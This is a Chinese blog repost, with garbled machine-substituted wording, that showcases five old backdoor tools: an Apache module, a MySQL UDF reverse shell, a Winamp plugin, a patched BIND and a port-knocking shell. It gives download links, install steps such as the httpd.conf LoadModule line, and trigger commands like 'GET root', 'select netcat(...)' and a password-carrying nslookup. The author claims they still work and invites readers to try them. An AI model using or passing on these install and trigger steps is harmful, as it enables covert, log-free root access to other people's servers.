老式后门之美:五种复旧近程控制东西(含下载)

目前,高级的rootkit技巧能够帮助你在渗入中拿到一个shell后停止持久性控制。此外,还有供应商故意提供了一些植入后门,但那就是截然不同的故事了。尽管各式花样翻新的技巧与代码层出不穷,可你还记得曾经用过的那些后门吗?

本文介绍了5种远程控制东西(Remote Administration Tools)RAT ,又称“后门”,这完全是根据作者个人喜好挑选的。这是我停止合法渗入测试时所应用的东西,它们对验证渗入的持久性与测量防御手段的有效性提供了重要的帮助。

1.mod_rootme——Apache模块后门(2004)

“mod_rootme是一个非常酷的模块,它能够在Apache中安装一个后门,你只须要停止一个简略的GET请求,就能够拿到一个root权限的shell,并且在体系中没有任何日志记录。”

作为最著名的东西之一,你只须要履行一个简略的make下令来共享库,将它复制到模块目录,在httpd.conf中写入入“LoadModule rootme2_module /usr/lib/apache2/modules/mod_rootme2.so”,然后应用‘apachetl stop;apachectl start'重启httpd后台进程。之后,通过“GET root”下令你就得到了一个root权限的shell。

下载:https://packetstormsecurity.com/files/33652/mod_rootme-0.3.tgz.html

2.raptor_winudf. —— UDF后门(2004-2006)

“这是一个基于UDF(用户界说函数)机制的后门东西。能够用它来产生一个反弹shell(netcat UDF监听80端口)或者履行一条体系下令(exec UDF)。”

这个反弹shell实现了一个有趣的功能,能够应用下令‘> select netcat(‘y.y.y.y');'来挪用,之后就会发送一个交互式shell在指定的主机(y.y.y.y)的80端口上。

下载 (Win32): https://www.0xdeadbeef.info/exploits/raptor_winudf.tgz

下载 (Linux): https://www.0xdeadbeef.info/exploits/raptor_udf2.c

截图来源:infamoussyn

3. get_wbkdr.dll插件——Winamp播放器后门(2006)

“wbkdr是非常著名的高保真音乐播放器软件Winamp后门的一个POC,它利用了插件接口,在24501端口中挪用cmd.exe。”

下载:https://packetstormsecurity.com/files/53268/wbkdr.zip.html

4.BIND反弹shell后门(2005)

BIND是世界上最流行的DNS服务器软件之一。这个后门应用了BIND未发布的补丁,是我的一个来自阿根廷的朋友开发的。基本上,须要你以root用户的身份来打补丁、以及运转服务。一旦运转,用‘nslookup backdoorpassword:x.x.x.x:port target_DNS_server' 发送一个DNS请求,将会在主机x.x.x.x的给定端口上触发一个反弹shell。

5.Knock-out—— 基于端口敲门(port-knocking)的后门

这是我应用数据包嗅探库libpcap()和数据包构造库libnet(客户端)制作的后门。我运用了端口敲门技巧,它能够是一个绑定端口的shell也能够是一个反弹型的shell。与客户端应用相同的配置文件来决定应用哪些端口以及发送每个网络包时间所须要的时间差。Knock-out支持TCP和UDP,并且最近在主机中仍然能够工作(测试体系Ubuntu Server 14.04)。

下载:https://packetstormsecurity.com/files/52834/knock-out.tar.gz.html

作者寄语

这些后门至今仍然有效,或许你能够尝试一下。同时,我鼓励大家与我们分享你见过的有趣的后门、你喜欢的后门、你用过的最特别的后门以及你所钟爱的后门。别忘了在Twitter上应用#oldschoolbackdoors(老式后门)标签!

【编辑推荐】

  1. TEL:(010)68476606】

转载自:https://netsecurity.51cto.com/art/201509/491118.htm

声明: 除非转自他站(如有侵权,请联系处理)外,本文采用 BY-NC-SA 协议进行授权 | 智乐兔
转载请注明:转自《老式后门之美:五种复旧近程控制东西(含下载)
本文地址:https://www.zhiletu.com/archives-4890.html
关注公众号:智乐兔

赞赏

wechat pay微信赞赏alipay pay支付宝赞赏

上一篇
下一篇

相关文章

在线留言

你必须 登录后 才能留言!

在线客服
在线客服 X

售前: 点击这里给我发消息
售后: 点击这里给我发消息

智乐兔官微